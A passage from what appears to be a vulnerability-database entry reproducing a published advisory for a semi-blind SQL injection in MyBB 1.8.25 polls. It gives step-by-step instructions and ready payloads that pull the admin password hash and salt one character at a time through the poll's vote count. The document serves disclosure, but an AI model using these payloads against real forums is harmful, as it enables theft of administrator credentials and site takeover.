poll\" section of the poll. \n \n4) Place the following payload in the \"vote count\" input (any entry within the votes[] parameter in the resulting POST request). \n \n1','2',ascii((select version())),'0','0','1','1') -- -a \n \n5) Save the poll. \n \n6) Perform a \"Move/Copy\" operation on the thread, moving it to a different forum, or making a copy in the same forum. \n \nThis is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect. \n \n7) Go to the copied/moved version of the thread (you should be redirected there automatically). \n \n8) Go to the \"Show Results\" section of the poll. \n \n9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. \n \nSince this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()). \nOther parameters in the INSERT query that we are injecting into are either too small, or unfeasible. \nUnsigned integer provides enough space to extract required data when enough requests are made. \n \nIn this case, the number is the ASCII code of the first character of the result of the injected select version() query. \nThis way we can transfer the output through this covert channel, one character at a time. \n \nIn order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int. \n \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 2, 1))),'0','0','1','1') -- -a \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 3, 1))),'0','0','1','1') -- -a \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 4, 1))),'0','0','1','1') -- -a \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 5, 1))),'0','0','1','1') -- -a \n \n... etc. \n \nThis will send the ASCII codes of every char of the hashed password through the integer covert channel. \n \n \n10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt. \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/161918/mybb1825-sql.txt"}]}

MyBB 1.8.25 Remote Command Execution

Description

Related